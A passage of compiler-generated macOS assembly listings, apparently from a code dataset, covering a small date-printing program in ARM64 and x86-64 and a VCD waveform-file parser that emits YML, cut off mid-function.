Header=BB0_3 Depth=2 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB0_3 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB0_1 LBB0_8: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_10 b LBB0_9 LBB0_9: bl ___stack_chk_fail LBB0_10: mov w0, #0 ldp x29, x30, [sp, #160] ; 16-byte Folded Reload add sp, sp, #176 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 2 ; @__const.main.monthDays l___const.main.monthDays: .long 31 ; 0x1f .long 29 ; 0x1d .long 31 ; 0x1f .long 30 ; 0x1e .long 31 ; 0x1f .long 30 ; 0x1e .long 31 ; 0x1f .long 31 ; 0x1f .long 30 ; 0x1e .long 31 ; 0x1f .long 30 ; 0x1e .long 31 ; 0x1f .p2align 2 ; @__const.main.months l___const.main.months: .long 1 ; 0x1 .long 2 ; 0x2 .long 3 ; 0x3 .long 4 ; 0x4 .long 5 ; 0x5 .long 6 ; 0x6 .long 7 ; 0x7 .long 8 ; 0x8 .long 9 ; 0x9 .long 10 ; 0xa .long 11 ; 0xb .long 12 ; 0xc .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%.2d.%.2d.13\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $144, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -116(%rbp) movl %edi, -120(%rbp) movq %rsi, -128(%rbp) leaq -64(%rbp), %rdi leaq l___const.main.monthDays(%rip), %rsi movl $48, %edx callq _memcpy leaq -112(%rbp), %rdi leaq l___const.main.months(%rip), %rsi movl $48, %edx callq _memcpy movl $0, -132(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 cmpl $12, -132(%rbp) jge LBB0_8 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl $0, -136(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -136(%rbp), %eax movslq -132(%rbp), %rcx cmpl -64(%rbp,%rcx,4), %eax jge LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movl -136(%rbp), %esi addl $1, %esi movslq -132(%rbp), %rax movl -112(%rbp,%rax,4), %edx leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movl -136(%rbp), %eax addl $1, %eax movl %eax, -136(%rbp) jmp LBB0_3 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movl -132(%rbp), %eax addl $1, %eax movl %eax, -132(%rbp) jmp LBB0_1 LBB0_8: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_10 ## %bb.9: xorl %eax, %eax addq $144, %rsp popq %rbp retq LBB0_10: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__const .p2align 4 ## @__const.main.monthDays l___const.main.monthDays: .long 31 ## 0x1f .long 29 ## 0x1d .long 31 ## 0x1f .long 30 ## 0x1e .long 31 ## 0x1f .long 30 ## 0x1e .long 31 ## 0x1f .long 31 ## 0x1f .long 30 ## 0x1e .long 31 ## 0x1f .long 30 ## 0x1e .long 31 ## 0x1f .p2align 4 ## @__const.main.months l___const.main.months: .long 1 ## 0x1 .long 2 ## 0x2 .long 3 ## 0x3 .long 4 ## 0x4 .long 5 ## 0x5 .long 6 ## 0x6 .long 7 ## 0x7 .long 8 ## 0x8 .long 9 ## 0x9 .long 10 ## 0xa .long 11 ## 0xb .long 12 ## 0xc .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%.2d.%.2d.13\n" .subsections_via_symbols
the_stack_data/40762343.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _chanId ; -- Begin function chanId .p2align 2 _chanId: ; @chanId .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str xzr, [sp, #16] ldur x0, [x29, #-8] bl _strlen str x0, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] subs x8, x8, #1 cset w8, lo tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #16] mov x9, #94 mul x8, x8, x9 ldur x9, [x29, #-8] ldr x10, [sp, #8] subs x10, x10, #1 ldrsb x9, [x9, x10] add x8, x8, x9 subs x8, x8, #33 str x8, [sp, #16] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #8] subs x8, x8, #1 str x8, [sp, #8] b LBB0_1 LBB0_4: ldr x8, [sp, #16] subs x8, x8, #400 cset w8, ls tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF bl _fprintf bl _exit LBB0_6: ldr x0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _unilen ; -- Begin function unilen .p2align 2 _unilen: ; @unilen .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str xzr, [sp] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ldrb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #8] ldrsb w8, [x8] and w8, w8, #0xc0 subs w8, w8, #128 cset w9, ne ; implicit-def: $x8 mov x8, x9 and x9, x8, #0x1 ldr x8, [sp] add x8, x8, x9 str x8, [sp] b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #8] add x8, x8, #1 str x8, [sp, #8] b LBB1_1 LBB1_4: ldr x0, [sp] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _parseVcdInstruction ; -- Begin function parseVcdInstruction .p2align 2 _parseVcdInstruction: ; @parseVcdInstruction .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #528 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #112] mov x9, sp sub x8, x29, #152 str x8, [sp, #104] ; 8-byte Folded Spill str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldr x1, [sp, #104] ; 8-byte Folded Reload adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_8 b LBB2_1 LBB2_1: add x0, sp, #120 str x0, [sp, #88] ; 8-byte Folded Spill mov w1, #0 mov x2, #144 bl _memset ldr x8, [sp, #112] mov x9, #62092 ldr w8, [x8, x9] str w8, [sp, #124] mov x0, #8 bl _malloc ldr x10, [sp, #88] ; 8-byte Folded Reload str x0, [sp, #256] add x8, x10, #8 mov x9, sp str x10, [x9] add x10, sp, #264 str x10, [x9, #8] str x8, [x9, #16] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _scanf ldr x8, [sp, #88] ; 8-byte Folded Reload ldr x9, [sp, #112] mov x10, #62100 ldr w9, [x9, x10] ; kill: def $x9 killed $w9 str x9, [sp, #96] ; 8-byte Folded Spill add x0, x8, #8 bl _strlen ldr x8, [sp, #96] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, ls tbnz w8, #0, LBB2_3 b LBB2_2 LBB2_2: ldr x8, [sp, #112] mov x9, #62100 ldr w8, [x8, x9] mov x0, x8 str x0, [sp, #80] ; 8-byte Folded Spill b LBB2_4 LBB2_3: add x8, sp, #120 add x0, x8, #8 bl _strlen str x0, [sp, #80] ; 8-byte Folded Spill b LBB2_4 LBB2_4: ldr x8, [sp, #80] ; 8-byte Folded Reload ldr x9, [sp, #112] mov x10, #62100 ; kill: def $w8 killed $w8 killed $x8 str w8, [x9, x10] ldr x8, [sp, #112] mov x9, #62104 ldr w8, [x8, x9] ldr w9, [sp, #120] subs w8, w8, w9 cset w8, ls tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: ldr x8, [sp, #112] mov x9, #62104 ldr w8, [x8, x9] str w8, [sp, #76] ; 4-byte Folded Spill b LBB2_7 LBB2_6: ldr w8, [sp, #120] str w8, [sp, #76] ; 4-byte Folded Spill b LBB2_7 LBB2_7: ldr w8, [sp, #76] ; 4-byte Folded Reload ldr x9, [sp, #112] mov x10, #62104 str w8, [x9, x10] ldr x8, [sp, #112] str x8, [sp, #64] ; 8-byte Folded Spill add x0, sp, #264 bl _chanId ldr x8, [sp, #64] ; 8-byte Folded Reload mov x9, #144 mul x9, x0, x9 add x0, x8, x9 add x1, sp, #120 mov x2, #144 bl _memcpy b LBB2_41 LBB2_8: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_15 b LBB2_9 LBB2_9: ldr x8, [sp, #112] mov x9, #61700 add x10, x8, x9 ldr w8, [x10] add w8, w8, #1 str w8, [x10] ldr x8, [sp, #112] ldr w8, [x8, x9] subs w8, w8, #32 cset w8, ne tbnz w8, #0, LBB2_11 b LBB2_10 LBB2_10: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fprintf bl _exit LBB2_11: ldr x8, [sp, #112] mov x9, #61700 ldr w8, [x8, x9] ldr x9, [sp, #112] mov x10, #62092 str x10, [sp, #48] ; 8-byte Folded Spill str w8, [x9, x10] ldr x8, [sp, #112] mov x9, #57600 str x9, [sp, #40] ; 8-byte Folded Spill add x8, x8, x9 ldr x9, [sp, #112] ldr w9, [x9, x10] ; kill: def $x9 killed $w9 add x8, x8, x9, lsl #7 mov x9, sp str x8, [x9] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _scanf ldr x9, [sp, #40] ; 8-byte Folded Reload ldr x10, [sp, #48] ; 8-byte Folded Reload ldr x8, [sp, #112] mov x11, #62096 ldr w8, [x8, x11] ; kill: def $x8 killed $w8 str x8, [sp, #56] ; 8-byte Folded Spill ldr x8, [sp, #112] add x8, x8, x9 ldr x9, [sp, #112] ldr w9, [x9, x10] ; kill: def $x9 killed $w9 add x0, x8, x9, lsl #7 bl _strlen ldr x8, [sp, #56] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, ls tbnz w8, #0, LBB2_13 b LBB2_12 LBB2_12: ldr x8, [sp, #112] mov x9, #62096 ldr w8, [x8, x9] mov x0, x8 str x0, [sp, #32] ; 8-byte Folded Spill b LBB2_14 LBB2_13: ldr x8, [sp, #112] mov x9, #57600 add x8, x8, x9 ldr x9, [sp, #112] mov x10, #62092 ldr w9, [x9, x10] ; kill: def $x9 killed $w9 add x0, x8, x9, lsl #7 bl _strlen str x0, [sp, #32] ; 8-byte Folded Spill b LBB2_14 LBB2_14: ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x9, [sp, #112] mov x10, #62096 ; kill: def $w8 killed $w8 killed $x8 str w8, [x9, x10] b LBB2_40 LBB2_15: adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_17 b LBB2_16 LBB2_16: ldr x8, [sp, #112] mov x9, #61708 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _scanf b LBB2_39 LBB2_17: adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_19 b LBB2_18 LBB2_18: ldr x8, [sp, #112] mov x9, #61836 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _scanf b LBB2_38 LBB2_19: adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_21 b LBB2_20 LBB2_20: ldr x8, [sp, #112] mov x9, #61704 add x10, x8, x9 ldr x8, [sp, #112] mov x9, #61964 add x8, x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _scanf b LBB2_37 LBB2_21: adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_23 b LBB2_22 LBB2_22: adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _scanf b LBB2_36 LBB2_23: adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_25 b LBB2_24 LBB2_24: adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _scanf ldr x9, [sp, #112] mov x10, #62092 mov w8, #0 str w8, [x9, x10] b LBB2_35 LBB2_25: adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_27 b LBB2_26 LBB2_26: adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _scanf b LBB2_34 LBB2_27: adrp x0, l_.str.16@PAGE add x0, x0, l_.str.16@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_29 b LBB2_28 LBB2_28: b LBB2_33 LBB2_29: adrp x0, l_.str.17@PAGE add x0, x0, l_.str.17@PAGEOFF sub x1, x29, #152 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_31 b LBB2_30 LBB2_30: b LBB2_32 LBB2_31: mov x9, sp sub x8, x29, #152 str x8, [x9] adrp x0, l_.str.18@PAGE add x0, x0, l_.str.18@PAGEOFF bl _printf b LBB2_32 LBB2_32: b LBB2_33 LBB2_33: b LBB2_34 LBB2_34: b LBB2_35 LBB2_35: b LBB2_36 LBB2_36: b LBB2_37 LBB2_37: b LBB2_38 LBB2_38: b LBB2_39 LBB2_39: b LBB2_40 LBB2_40: b LBB2_41 LBB2_41: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_43 b LBB2_42 LBB2_42: bl ___stack_chk_fail LBB2_43: add sp, sp, #528 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _parseVcdTimestamp ; -- Begin function parseVcdTimestamp .p2align 2 _parseVcdTimestamp: ; @parseVcdTimestamp .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] mov x9, #61696 ldr w8, [x8, x9] subs w8, w8, #0 cset w8, ls tbnz w8, #0, LBB3_8 b LBB3_1 LBB3_1: ldur x8, [x29, #-8] stur x8, [x29, #-16] b LBB3_2 LBB3_2: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-16] ldur x9, [x29, #-8] mov x10, #57600 add x9, x9, x10 subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB3_7 b LBB3_3 LBB3_3: ; in Loop: Header=BB3_2 Depth=1 ldur x8, [x29, #-16] ldr w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB3_5 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_2 Depth=1 b LBB3_6 LBB3_5: ; in Loop: Header=BB3_2 Depth=1 ldur x8, [x29, #-16] ldr x0, [x8, #136] ldur x8, [x29, #-8] mov x9, #61696 str x9, [sp, #16] ; 8-byte Folded Spill ldr w8, [x8, x9] add w8, w8, #1 mov x9, x8 mov x8, #8 mul x1, x8, x9 bl _realloc ldr x12, [sp, #16] ; 8-byte Folded Reload ldur x8, [x29, #-16] str x0, [x8, #136] ldur x8, [x29, #-16] ldr x9, [x8, #136] ldur x8, [x29, #-8] ldr w8, [x8, x12] mov x10, x8 ldur x8, [x29, #-16] ldr x8, [x8, #136] ldur x11, [x29, #-8] ldr w11, [x11, x12] subs w11, w11, #1 ldr x8, [x8, w11, uxtw #3] str x8, [x9, x10, lsl #3] b LBB3_6 LBB3_6: ; in Loop: Header=BB3_2 Depth=1 ldur x8, [x29, #-16] add x8, x8, #144 stur x8, [x29, #-16] b LBB3_2 LBB3_7: b LBB3_8 LBB3_8: mov x9, sp add x8, sp, #24 str x8, [x9] adrp x0, l_.str.19@PAGE add x0, x0, l_.str.19@PAGEOFF bl _scanf ldur x8, [x29, #-8] mov x9, #61696 add x9, x8, x9 ldr w8, [x9] add w8, w8, #1 str w8, [x9] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _parseVcdSample ; -- Begin function parseVcdSample .p2align 2 _parseVcdSample: ; @parseVcdSample .cfi_startproc ; %bb.0: sub sp, sp, #224 .cfi_def_cfa_offset 224 stp x29, x30, [sp, #208] ; 16-byte Folded Spill add x29, sp, #208 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str x0, [sp, #64] str w1, [sp, #60] str xzr, [sp, #48] ldr w8, [sp, #60] subs w8, w8, #98 cset w8, ne tbnz w8, #0, LBB4_15 b LBB4_1 LBB4_1: bl _getchar str w0, [sp, #60] b LBB4_2 LBB4_2: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #60] adds w8, w8, #1 cset w8, eq mov w9, #0 str w9, [sp, #44] ; 4-byte Folded Spill tbnz w8, #0, LBB4_4 b LBB4_3 LBB4_3: ; in Loop: Header=BB4_2 Depth=1 ldr w8, [sp, #60] subs w8, w8, #32 cset w8, ne str w8, [sp, #44] ; 4-byte Folded Spill b LBB4_4 LBB4_4: ; in Loop: Header=BB4_2 Depth=1 ldr w8, [sp, #44] ; 4-byte Folded Reload tbz w8, #0, LBB4_14 b LBB4_5 LBB4_5: ; in Loop: Header=BB4_2 Depth=1 ldr w8, [sp, #60] subs w8, w8, #48 cset w8, eq tbnz w8, #0, LBB4_7 b LBB4_6 LBB4_6: ; in Loop: Header=BB4_2 Depth=1 ldr w8, [sp, #60] subs w8, w8, #49 cset w8, ne tbnz w8, #0, LBB4_8 b LBB4_7 LBB4_7: ; in Loop: Header=BB4_2 Depth=1 ldr w9, [sp, #52] ldr w8, [sp, #60] subs w8, w8, #48 add w8, w8, w9, lsl #1 str w8, [sp, #52] b LBB4_12 LBB4_8: ; in Loop: Header=BB4_2 Depth=1 ldr w1, [sp, #60] adrp x0, l_.str.20@PAGE add x0, x0, l_.str.20@PAGEOFF bl _strchr subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB4_10 b LBB4_9 LBB4_9: ; in Loop: Header=BB4_2 Depth=1 ldr w8, [sp, #60] strb w8, [sp, #48] b LBB4_11 LBB4_10: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] ldr w9, [sp, #60] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x1, l_.str.21@PAGE add x1, x1, l_.str.21@PAGEOFF bl _fprintf bl _exit LBB4_11: ; in Loop: Header=BB4_2 Depth=1 b LBB4_12 LBB4_12: ; in Loop: Header=BB4_2 Depth=1 b LBB4_13 LBB4_13: ; in Loop: Header=BB4_2 Depth=1 bl _getchar str w0, [sp, #60] b LBB4_2 LBB4_14: b LBB4_22 LBB4_15: ldr w0, [sp, #60] bl _isalpha subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB4_17 b LBB4_16 LBB4_16: ldr w8, [sp, #60] str w8, [sp, #40] ; 4-byte Folded Spill b LBB4_18 LBB4_17: mov w8, #0 str w8, [sp, #40] ; 4-byte Folded Spill b LBB4_18 LBB4_18: ldr w8, [sp, #40] ; 4-byte Folded Reload strb w8, [sp, #48] ldr w0, [sp, #60] bl _isdigit subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB4_20 b LBB4_19 LBB4_19: ldr w8, [sp, #60] subs w8, w8, #48 str w8, [sp, #36] ; 4-byte Folded Spill b LBB4_21 LBB4_20: mov w8, #0 str w8, [sp, #36] ; 4-byte Folded Spill b LBB4_21 LBB4_21: ldr w8, [sp, #36] ; 4-byte Folded Reload str w8, [sp, #52] b LBB4_22 LBB4_22: mov x9, sp add x8, sp, #72 str x8, [sp, #16] ; 8-byte Folded Spill str x8, [x9] adrp x0, l_.str.22@PAGE add x0, x0, l_.str.22@PAGEOFF bl _scanf ldr x0, [sp, #16] ; 8-byte Folded Reload ldr x8, [sp, #64] str x8, [sp, #24] ; 8-byte Folded Spill bl _chanId ldr x8, [sp, #24] ; 8-byte Folded Reload mov x9, #144 mul x9, x0, x9 add x8, x8, x9 ldr x9, [x8, #136] ldr x8, [sp, #64] mov x10, #61696 ldr w8, [x8, x10] subs w10, w8, #1 ldr x8, [sp, #48] str x8, [x9, w10, uxtw #3] ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB4_24 b LBB4_23 LBB4_23: bl ___stack_chk_fail LBB4_24: ldp x29, x30, [sp, #208] ; 16-byte Folded Reload add sp, sp, #224 ret .cfi_endproc ; -- End function .globl _parseVcd ; -- Begin function parseVcd .p2align 2 _parseVcd: ; @parseVcd .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] bl _getchar stur w0, [x29, #-12] b LBB5_1 LBB5_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] adds w8, w8, #1 cset w8, eq tbnz w8, #0, LBB5_15 b LBB5_2 LBB5_2: ; in Loop: Header=BB5_1 Depth=1 ldur w0, [x29, #-12] bl _isspace subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB5_4 b LBB5_3 LBB5_3: ; in Loop: Header=BB5_1 Depth=1 b LBB5_14 LBB5_4: ; in Loop: Header=BB5_1 Depth=1 ldur w8, [x29, #-12] subs w8, w8, #36 cset w8, ne tbnz w8, #0, LBB5_6 b LBB5_5 LBB5_5: ; in Loop: Header=BB5_1 Depth=1 ldur x0, [x29, #-8] bl _parseVcdInstruction b LBB5_13 LBB5_6: ; in Loop: Header=BB5_1 Depth=1 ldur w8, [x29, #-12] subs w8, w8, #35 cset w8, ne tbnz w8, #0, LBB5_8 b LBB5_7 LBB5_7: ; in Loop: Header=BB5_1 Depth=1 ldur x0, [x29, #-8] bl _parseVcdTimestamp b LBB5_12 LBB5_8: ; in Loop: Header=BB5_1 Depth=1 ldur w1, [x29, #-12] adrp x0, l_.str.20@PAGE add x0, x0, l_.str.20@PAGEOFF bl _strchr subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB5_10 b LBB5_9 LBB5_9: ; in Loop: Header=BB5_1 Depth=1 ldur x0, [x29, #-8] ldur w1, [x29, #-12] bl _parseVcdSample b LBB5_11 LBB5_10: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x1, l_.str.23@PAGE add x1, x1, l_.str.23@PAGEOFF bl _fprintf bl _exit LBB5_11: ; in Loop: Header=BB5_1 Depth=1 b LBB5_12 LBB5_12: ; in Loop: Header=BB5_1 Depth=1 b LBB5_13 LBB5_13: ; in Loop: Header=BB5_1 Depth=1 b LBB5_14 LBB5_14: ; in Loop: Header=BB5_1 Depth=1 bl _getchar stur w0, [x29, #-12] b LBB5_1 LBB5_15: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _printYml ; -- Begin function printYml .p2align 2 _printYml: ; @printYml .cfi_startproc ; %bb.0: sub sp, sp, #176 .cfi_def_cfa_offset 176 stp x29, x30, [sp, #160] ; 16-byte Folded Spill add x29, sp, #160 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] stur x8, [x29, #-72] ; 8-byte Folded Spill stur x0, [x29, #-8] stur x1, [x29, #-16] ldur x8, [x29, #-16] ldr x0, [x8, #16] bl _unilen subs x8, x0, #1 cset w8, eq tbnz w8, #0, LBB6_2 b LBB6_1 LBB6_1: ldur x8, [x29, #-72] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.24@PAGE add x1, x1, l_.str.24@PAGEOFF bl _fprintf bl _exit LBB6_2: ldur x8, [x29, #-16] ldr x0, [x8] bl _unilen subs x8, x0, #1 cset w8, eq tbnz w8, #0, LBB6_4 b LBB6_3 LBB6_3: ldur x8, [x29, #-72] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.25@PAGE add x1, x1, l_.str.25@PAGEOFF bl _fprintf bl _exit LBB6_4: ldur x8, [x29, #-16] ldr x0, [x8, #24] bl _unilen subs x8, x0, #1 cset w8, ls tbnz w8, #0, LBB6_6 b LBB6_5 LBB6_5: ldur x8, [x29, #-72] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.26@PAGE add x1, x1, l_.str.26@PAGEOFF bl _fprintf bl _exit LBB6_6: ldur x8, [x29, #-16] ldr x0, [x8, #8] bl _unilen subs x8, x0, #1 cset w8, ls tbnz w8, #0, LBB6_8 b LBB6_7 LBB6_7: ldur x8, [x29, #-72] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.27@PAGE add x1, x1, l_.str.27@PAGEOFF bl _fprintf bl _exit LBB6_8: ldur x8, [x29, #-8] mov x9, #62104 ldr w8, [x8, x9] add w8, w8, #7 lsr w8, w8, #2 stur w8, [x29, #-20] ldur x8, [x29, #-16] ldr x8, [x8, #24] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq mov w9, #0 stur w9, [x29, #-76] ; 4-byte Folded Spill tbnz w8, #0, LBB6_10 b LBB6_9 LBB6_9: ldur x8, [x29, #-16] ldr x8, [x8, #8] ldrsb w8, [x8] subs w8, w8, #0 cset w8, ne stur w8, [x29, #-76] ; 4-byte Folded Spill b LBB6_10 LBB6_10: ldur w8, [x29, #-76] ; 4-byte Folded Reload and w8, w8, #0x1 stur w8, [x29, #-24] adrp x0, l_.str.28@PAGE add x0, x0, l_.str.28@PAGEOFF bl _printf ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.29@PAGE add x0, x0, l_.str.29@PAGEOFF bl _printf ldur x8, [x29, #-8] mov x9, #61708 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.30@PAGE add x0, x0, l_.str.30@PAGEOFF bl _printf ldur x8, [x29, #-8] mov x9, #61696 ldr w9, [x8, x9] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.31@PAGE add x0, x0, l_.str.31@PAGEOFF bl _printf ldur x8, [x29, #-16] ldr w9, [x8, #48] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, 